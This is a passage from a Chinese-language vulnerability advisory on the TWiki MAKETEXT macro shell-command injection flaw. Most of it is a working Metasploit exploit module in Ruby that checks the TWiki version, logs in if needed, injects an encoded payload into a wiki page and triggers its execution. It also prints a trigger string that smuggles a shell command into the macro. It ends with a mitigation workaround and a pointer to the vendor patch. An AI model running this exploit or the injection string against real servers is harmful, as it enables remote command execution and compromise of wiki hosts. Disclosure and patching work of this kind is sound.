TWiki twiki/lib/TWiki.pm MAKETEXT宏任意shell命令注入漏洞(3)

if not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/
            print_warning("Error injecting the payload")
            print_status "#{res.code}\n#{res.body}\n#{res.headers['Location']}"
            return nil
        end

location = URI(res.headers['Location']).path
        print_good("Payload injected on #{location}")

return location
    end

def check
        @base = target_uri.path
        @base << '/' if @base[-1, 1] != '/'

res = send_request_cgi({
            'uri'      => "#{@base}do/view/TWiki/WebHome"
        })

if not res or res.code != 200
            return Exploit::CheckCode::Unknown
        end

if res.body =~ /This site is running TWiki version.*TWiki-(\d\.\d\.\d)/
            version = $1
            print_status("Version found: #{version}")
            if version < "5.1.3"
                return Exploit::CheckCode::Appears
            else
                return Exploit::CheckCode::Safe
            end
        end

return Exploit::CheckCode::Detected
    end

    def exploit

# Init variables
        @page = ''

if datastore['TwikiPage'] and not datastore['TwikiPage'].empty?
            @page << '/' if datastore['TwikiPage'][0] != '/'
            @page << datastore['TwikiPage']
        else
            @page << "/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}"
        end

@base = target_uri.path
        @base << '/' if @base[-1, 1] != '/'

# Login if needed
        if (datastore['USERNAME'] and
            not datastore['USERNAME'].empty? and
            datastore['PASSWORD'] and
            not datastore['PASSWORD'].empty?)
            print_status("Trying login to get session ID...")
            session = do_login(datastore['USERNAME'], datastore['PASSWORD'])
        else
            print_status("Using anonymous access...")
            session = ""
        end

if not session
            fail_with(Exploit::Failure::Unknown, "Error getting a session ID")
        end

# Inject payload
        print_status("Trying to inject the payload on #{@page}...")
        res = inject_code(session, payload.encoded)
        if not res
            fail_with(Exploit::Failure::Unknown, "Error injecting the payload")
        end

# Execute payload
        print_status("Executing the payload through #{res}...")
        res = send_request_cgi({
            'uri'      => res,
            'cookie'  => "TWIKISID=#{session}"
        })
        if not res or res.code != 200 or res.body !~ /HASH/
            fail_with(Exploit::Failure::Unknown, "Error executing the payload")
        end

print_good("Exploitation was successful")

end

end

=begin

* Trigger:

%MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}%

=end

建议：
--------------------------------------------------------------------------------
临时解决方法：
 
如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：
 
* 通过将flag {UserInterfaceInternationalisation} 设置为0禁用本地化操作。
 
厂商补丁：
 
TWiki
 -----
 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：